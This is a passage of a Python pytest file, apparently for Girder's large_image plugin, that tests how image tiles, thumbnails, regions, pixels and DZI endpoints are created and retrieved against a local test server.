this dictionary.
:param error: if present, expect to get an error from the tile info
query and ensure that this string is in the error
message.
:returns: the tile information dictionary.
"""
if params is None:
params = {}
try:
resp = server.request(path='/item/test/tiles', user=admin,
params=params)
if error:
assert utilities.respStatus(resp) == 400
assert error in resp.json['message']
return None
except AssertionError as exc:
if error:
assert error in exc.args[0]
return
else:
raise
assert utilities.respStatus(resp) == 200
infoDict = resp.json
if info:
for key in info:
assert infoDict[key] == info[key]
return infoDict
def _postTileViaHttp(server, admin, itemId, fileId, jobAction=None, data=None):
"""
When we know we need to process a job, we have to use an actual http
request rather than the normal simulated request to cherrypy. This is
required because cherrypy needs to know how it was reached so that
girder_worker can reach it when done.
:param itemId: the id of the item with the file to process.
:param fileId: the id of the file that should be processed.
:param jobAction: if 'delete', delete the job immediately.
:param data: if not None, pass this as the data to the POST request. If
specified, fileId is ignored (pass as part of the data dictionary if
it is required).
:returns: metadata from the tile if the conversion was successful,
        False if it converted but didn't result in usable tiles, and
None if it failed.
"""
headers = {
'Accept': 'application/json',
'Girder-Token': str(Token().createToken(admin)['_id'])
}
req = requests.post('http://127.0.0.1:%d/api/v1/item/%s/tiles' % (
server.boundPort, itemId), headers=headers,
data={'fileId': fileId} if data is None else data)
assert req.status_code == 200
if jobAction == 'delete':
Job().remove(Job().find({}, sort=[('_id', SortDir.DESCENDING)])[0])
# Wait for the job to be complete
starttime = time.time()
while time.time() - starttime < 30:
req = requests.get(
'http://127.0.0.1:%d/api/v1/worker/status' % server.boundPort, headers=headers)
resp = req.json()
if resp.get('active') and not len(next(iter(resp['active'].items()))[1]):
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
if (utilities.respStatus(resp) == 400 and
'No large image file' in resp.json['message']):
break
time.sleep(0.1)
else:
# If we ask to create the item again right away, we should be told that
# either there is already a job running or the item has already been
# added
req = requests.post('http://127.0.0.1:%d/api/v1/item/%s/tiles' % (
server.boundPort, itemId), headers=headers,
data={'fileId': fileId} if data is None else data)
assert req.status_code == 400
assert ('Item already has' in req.json()['message'] or
'Item is scheduled' in req.json()['message'])
starttime = time.time()
resp = None
while time.time() - starttime < 30:
try:
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
break
except AssertionError:
result = resp.json['message']
if "didn't meet requirements" in result:
return False
if 'No large image file' in result:
return None
assert 'is still pending creation' in result
time.sleep(0.1)
assert utilities.respStatus(resp) == 200
return resp.json
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromPTIF(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
# We should already have tile information. Ask to delete it so we can
# do other tests
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# Now we shouldn't have tile information
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId, user=admin)
assert utilities.respStatus(resp) == 404
assert 'No large image file' in resp.json['message']
# Asking to delete the tile information succeeds but does nothing
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is False
# Ask to make this a tile-based item with an invalid file ID
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': itemId})
assert utilities.respStatus(resp) == 400
assert 'No such file' in resp.json['message']
# Ask to make this a tile-based item properly
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': fileId})
assert utilities.respStatus(resp) == 200
# Now the tile request should tell us about the file. These are
# specific to our test file
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 58368
assert tileMetadata['sizeY'] == 12288
assert tileMetadata['levels'] == 9
assert tileMetadata['magnification'] == 40
assert tileMetadata['mm_x'] == 0.00025
assert tileMetadata['mm_y'] == 0.00025
tileMetadata['sparse'] = 5
_testTilesZXY(server, admin, itemId, tileMetadata)
# Check that we conditionally get JFIF headers
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] != utilities.JFIFHeader
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False,
params={'encoding': 'JFIF'})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] == utilities.JFIFHeader
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False,
additionalHeaders=[('User-Agent', 'iPad')])
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] == utilities.JFIFHeader
resp = server.request(
path='/item/%s/tiles/zxy/0/0/0' % itemId, user=admin,
isJson=False, additionalHeaders=[(
'User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X '
'10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) '
'Version/10.0.3 Safari/602.4.8')])
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] == utilities.JFIFHeader
resp = server.request(
path='/item/%s/tiles/zxy/0/0/0' % itemId, user=admin,
isJson=False, additionalHeaders=[(
'User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 '
'Safari/537.36')])
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JFIFHeader)] != utilities.JFIFHeader
# Ask to make this a tile-based item again
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': fileId})
assert utilities.respStatus(resp) == 400
assert 'Item already has' in resp.json['message']
# We should be able to delete the large image information
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We should no longer have tile information
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# We should be able to re-add it (we are also testing that fileId is
# optional if there is only one file).
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromTest(server, admin, fsAssetstore):
publicFolder = utilities.namedFolder(admin, 'Public')
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
items = [{'itemId': str(file['itemId']), 'fileId': str(file['_id'])}]
# We should already have tile information. Ask to delete it so we can
# do other tests
resp = server.request(path='/item/%s/tiles' % str(file['itemId']),
method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# Create a second item
resp = server.request(path='/item', method='POST', user=admin,
params={'folderId': publicFolder['_id'],
'name': 'test'})
assert utilities.respStatus(resp) == 200
itemId = str(resp.json['_id'])
items.append({'itemId': itemId})
# Check that we can't create a tile set with another item's file
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin,
params={'fileId': items[0]['fileId']})
assert utilities.respStatus(resp) == 400
assert 'The provided file must be in the provided item' in resp.json['message']
# Now create a test tile with the default options
params = {'encoding': 'JPEG'}
meta = _createTestTiles(server, admin, params, {
'tileWidth': 256, 'tileHeight': 256,
'sizeX': 256 * 2 ** 9, 'sizeY': 256 * 2 ** 9, 'levels': 10
})
_testTilesZXY(server, admin, 'test', meta, params)
# Test most of our parameters in a single special case
params = {
'minLevel': 2,
'maxLevel': 5,
'tileWidth': 160,
'tileHeight': 120,
'sizeX': 5000,
'sizeY': 3000,
'encoding': 'JPEG'
}
meta = _createTestTiles(server, admin, params, {
'tileWidth': 160, 'tileHeight': 120,
'sizeX': 5000, 'sizeY': 3000, 'levels': 6
})
meta['minLevel'] = 2
_testTilesZXY(server, admin, 'test', meta, params)
# Test the fractal tiles with PNG
params = {'fractal': 'true'}
meta = _createTestTiles(server, admin, params, {
'tileWidth': 256, 'tileHeight': 256,
'sizeX': 256 * 2 ** 9, 'sizeY': 256 * 2 ** 9, 'levels': 10
})
_testTilesZXY(server, admin, 'test', meta, params, utilities.PNGHeader)
# Test that the fractal isn't the same as the non-fractal
resp = server.request(path='/item/test/tiles/zxy/0/0/0', user=admin,
params=params, isJson=False)
image = utilities.getBody(resp, text=False)
resp = server.request(path='/item/test/tiles/zxy/0/0/0', user=admin,
isJson=False)
assert utilities.getBody(resp, text=False) != image
# Test each property with an invalid value
badParams = {
'minLevel': 'a',
'maxLevel': False,
'tileWidth': (),
'tileHeight': [],
'sizeX': {},
'sizeY': 1.3,
'encoding': 2,
}
for key in badParams:
err = ('parameter is an incorrect' if key != 'encoding' else
'Invalid encoding')
_createTestTiles(server, admin, {key: badParams[key]}, error=err)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromPNG(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
    # Ask to make this a tile-based item with a missing file ID (there are
# now two files, so this will now fail).
resp = boundServer.request(path='/item/%s/tiles' % itemId, method='POST', user=admin)
assert utilities.respStatus(resp) == 400
assert 'Missing "fileId"' in resp.json['message']
# We should be able to delete the tiles
resp = boundServer.request(path='/item/%s/tiles' % itemId, method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
    # We should no longer have tile information
resp = boundServer.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# This should work with a PNG with transparency, too.
file = utilities.uploadTestFile('yb10kx5ktrans.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
# We should be able to delete the tiles
resp = boundServer.request(path='/item/%s/tiles' % itemId, method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We should no longer have tile information
resp = boundServer.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesDeleteJob(boundServer, admin, fsAssetstore, girderWorker):
# Make sure we don't auto-create a largeImage
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore, name='yb10kx5k.tiff')
itemId = str(file['itemId'])
resp = boundServer.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# Try to create an image, but delete the job and check that it fails.
fileId = str(file['_id'])
result = _postTileViaHttp(boundServer, admin, itemId, fileId, jobAction='delete',
data={'countdown': 10, 'fileId': fileId})
assert result is None
# If we end the test here, girder_worker may upload a file that gets
    # discarded, but do so in a manner that interferes with cleaning up the test
# temp directory. By running other tasks, this is less likely to occur.
# Creating it again should work
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['levels'] == 7
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromGreyscale(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('grey10kx5k.tif', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromUnicodeName(boundServer, admin, fsAssetstore, girderWorker):
# Unicode file names shouldn't cause problems when generating tiles.
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
# Our normal testing method doesn't pass through the unicode name
# properly, so just change it after upload.
file = File().load(file['_id'], force=True)
file['name'] = '\u0441\u043b\u0430\u0439\u0434'
file = File().save(file)
fileId = str(file['_id'])
itemId = str(file['itemId'])
item = Item().load(itemId, force=True)
item['name'] = 'item \u0441\u043b\u0430\u0439\u0434'
item = Item().save(item)
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesWithUnicodeName(server, admin, fsAssetstore):
# Unicode file names shouldn't cause problems when accessing ptifs.
# This requires an appropriate version of the python libtiff module.
name = '\u0441\u043b\u0430\u0439\u0434.ptif'
origpath = utilities.externaldata('data/sample_image.ptif.sha512')
altpath = os.path.join(os.path.dirname(origpath), name)
if os.path.exists(altpath):
os.unlink(altpath)
shutil.copy(origpath, altpath)
file = utilities.uploadFile(altpath, admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 58368
assert tileMetadata['sizeY'] == 12288
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromBadFiles(boundServer, admin, fsAssetstore, girderWorker):
# As of vips 8.2.4, alpha and unusual channels are removed upon
# conversion to a JPEG-compressed tif file. Originally, we performed a
# test to show that these files didn't work. They now do (though if
# the file has a separated color space, it may not work as expected).
# Uploading a non-image file should run a job, but not result in tiles
file = utilities.uploadTestFile('notanimage.txt', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata is None
resp = boundServer.request(path='/item/%s/tiles' % itemId,
method='DELETE', user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is False
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testThumbnails(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
# We should already have tile information. Ask to delete it so we can
# do other tests
resp = server.request(path='/item/%s/tiles' % itemId, method='DELETE',
user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json['deleted'] is True
# We shouldn't be able to get a thumbnail yet
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# Ask to make this a tile-based item
resp = server.request(path='/item/%s/tiles' % itemId, method='POST',
user=admin, params={'fileId': fileId})
assert utilities.respStatus(resp) == 200
# Get metadata to use in our thumbnail tests
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
# Now we should be able to get a thumbnail
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
defaultLength = len(image)
# Test width and height using PNGs
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False,
params={'encoding': 'PNG'})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert max(width, height) == 256
# We know that we are using an example where the width is greater than
# the height
origWidth = int(tileMetadata['sizeX'] *
2 ** -(tileMetadata['levels'] - 1))
origHeight = int(tileMetadata['sizeY'] *
2 ** -(tileMetadata['levels'] - 1))
assert height == int(width * origHeight / origWidth)
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False,
params={'encoding': 'PNG', 'width': 200})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 200
assert height == int(width * origHeight / origWidth)
# Test bad parameters
badParams = [
({'encoding': 'invalid'}, 400, 'Invalid encoding'),
({'width': 'invalid'}, 400, 'incorrect type'),
({'width': 0}, 400, 'Invalid width or height'),
({'width': -5}, 400, 'Invalid width or height'),
({'height': 'invalid'}, 400, 'incorrect type'),
({'height': 0}, 400, 'Invalid width or height'),
({'height': -5}, 400, 'Invalid width or height'),
({'jpegQuality': 'invalid'}, 400, 'incorrect type'),
({'jpegSubsampling': 'invalid'}, 400, 'incorrect type'),
({'fill': 'not a color'}, 400, 'unknown color'),
]
for entry in badParams:
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin,
params=entry[0])
assert utilities.respStatus(resp) == entry[1]
assert entry[2] in resp.json['message']
# Test that we get a thumbnail from a cached file
resp = server.request(path='/item/%s/tiles/thumbnail' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
assert len(image) == defaultLength
# We should report some thumbnails
item = Item().load(itemId, user=admin)
present, removed = ImageItem().removeThumbnailFiles(item, keep=10)
assert present > 2
# Remove the item, and then there should be zero files.
Item().remove(item)
present, removed = ImageItem().removeThumbnailFiles(item, keep=10)
assert present == 0
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testContentDisposition(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
params = {'encoding': 'PNG', 'width': 200}
path = '/item/%s/tiles/thumbnail' % itemId
params['contentDisposition'] = 'inline'
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert resp.headers['Content-Disposition'].startswith('inline')
assert (
resp.headers['Content-Disposition'].endswith('.png') or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
params['contentDisposition'] = 'attachment'
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert resp.headers['Content-Disposition'].startswith('attachment')
assert (
resp.headers['Content-Disposition'].endswith('.png') or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
params['contentDisposition'] = 'other'
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert (
resp.headers.get('Content-Disposition') is None or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
del params['contentDisposition']
resp = server.request(path=path, user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
assert (
resp.headers.get('Content-Disposition') is None or
'largeImageThumbnail' in resp.headers['Content-Disposition'])
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testRegions(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Get metadata to use in our tests
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
# Test bad parameters
badParams = [
({'encoding': 'invalid', 'width': 10}, 400, 'Invalid encoding'),
({'width': 'invalid'}, 400, 'incorrect type'),
({'width': -5}, 400, 'Invalid output width or height'),
({'height': 'invalid'}, 400, 'incorrect type'),
({'height': -5}, 400, 'Invalid output width or height'),
({'jpegQuality': 'invalid', 'width': 10}, 400, 'incorrect type'),
({'jpegSubsampling': 'invalid', 'width': 10}, 400,
'incorrect type'),
({'left': 'invalid'}, 400, 'incorrect type'),
({'right': 'invalid'}, 400, 'incorrect type'),
({'top': 'invalid'}, 400, 'incorrect type'),
({'bottom': 'invalid'}, 400, 'incorrect type'),
({'regionWidth': 'invalid'}, 400, 'incorrect type'),
({'regionHeight': 'invalid'}, 400, 'incorrect type'),
({'units': 'invalid'}, 400, 'Invalid units'),
({'unitsWH': 'invalid'}, 400, 'Invalid units'),
]
for entry in badParams:
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin,
params=entry[0])
assert utilities.respStatus(resp) == entry[1]
assert entry[2] in resp.json['message']
# Get a small region for testing. Our test file is sparse, so
# initially get a region where there is full information.
params = {'regionWidth': 1000, 'regionHeight': 1000,
'left': 48000, 'top': 3000}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = origImage = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
# We can use base_pixels for width and height and fractions for top and
# left
params = {
'regionWidth': 1000,
'regionHeight': 1000,
'left': 48000.0 / tileMetadata['sizeX'],
'top': 3000.0 / tileMetadata['sizeY'],
'units': 'fraction',
'unitsWH': 'base'}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image == origImage
# 0-sized results are allowed
params = {'regionWidth': 1000, 'regionHeight': 0,
'left': 48000, 'top': 3000, 'width': 1000, 'height': 1000}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert len(image) == 0
# Test scaling (and a sparse region from our file)
params = {'regionWidth': 2000, 'regionHeight': 1500,
'width': 500, 'height': 500, 'encoding': 'PNG'}
resp = server.request(path='/item/%s/tiles/region' % itemId,
user=admin, isJson=False, params=params)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 500
assert height == 375
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testPixel(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Test bad parameters
badParams = [
({'left': 'invalid'}, 400, 'incorrect type'),
({'top': 'invalid'}, 400, 'incorrect type'),
({'units': 'invalid'}, 400, 'Invalid units'),
]
for entry in badParams:
resp = server.request(path='/item/%s/tiles/pixel' % itemId,
user=admin,
params=entry[0])
assert utilities.respStatus(resp) == entry[1]
assert entry[2] in resp.json['message']
# Test a good query
resp = server.request(
path='/item/%s/tiles/pixel' % itemId, user=admin,
params={'left': 48000, 'top': 3000})
assert utilities.respStatus(resp) == 200
assert resp.json == {'r': 237, 'g': 248, 'b': 242}
# If it is outside of the image, we get an empty result
resp = server.request(
path='/item/%s/tiles/pixel' % itemId, user=admin,
params={'left': 148000, 'top': 3000})
assert utilities.respStatus(resp) == 200
assert resp.json == {}
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testGetTileSource(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# We should have access via getGirderTileSource
source = getGirderTileSource(itemId, user=admin)
image, mime = source.getThumbnail(encoding='PNG', height=200)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
# We can also use a file with getTileSource. The user is ignored.
imagePath = utilities.externaldata('data/sample_image.ptif.sha512')
source = getTileSource(imagePath, user=admin, encoding='PNG')
image, mime = source.getThumbnail(encoding='JPEG', width=200)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
# Test the level0 thumbnail code path
image, mime = source.getThumbnail(
encoding='PNG', width=200, height=100, levelZero=True, fill='blue')
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 200
assert height == 100
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesLoadModelCache(server, admin, fsAssetstore):
loadmodelcache.invalidateLoadModelCache()
token = str(Token().createToken(admin)['_id'])
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Now the tile request should tell us about the file. These are
# specific to our test file
resp = server.request(path='/item/%s/tiles' % itemId, token=token)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
tileMetadata['sparse'] = 5
_testTilesZXY(server, admin, itemId, tileMetadata, token=token)
assert next(iter(loadmodelcache.LoadModelCache.values()))['hits'] > 70
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesModelLookupCache(server, user, admin, fsAssetstore):
User().load = mock.Mock(wraps=User().load)
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
token = str(Token().createToken(user)['_id'])
lastCount = User().load.call_count
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
token=token, isJson=False)
assert utilities.respStatus(resp) == 200
assert User().load.call_count == lastCount + 1
lastCount = User().load.call_count
resp = server.request(path='/item/%s/tiles/zxy/1/0/0' % itemId,
token=token, isJson=False)
assert utilities.respStatus(resp) == 200
assert User().load.call_count == lastCount
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesDZIEndpoints(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
xml = utilities.getBody(resp)
assert 'Width="%d"' % tileMetadata['sizeX'] in xml
assert 'Overlap="0"' in xml
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
xml = utilities.getBody(resp)
assert 'Width="%d"' % tileMetadata['sizeX'] in xml
assert 'Overlap="4"' in xml
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'encoding': 'PNG'
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 228
assert height == 48
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image
# Test bad queries
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'encoding': 'TIFF'
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'tilesize': 128
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'tilesize': 129
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'overlap': -1
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'tilesize': 128
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'tilesize': 129
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'overlap': -1
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/0/0_0.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/20/0_0.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/12/0_3.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/12/15_0.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
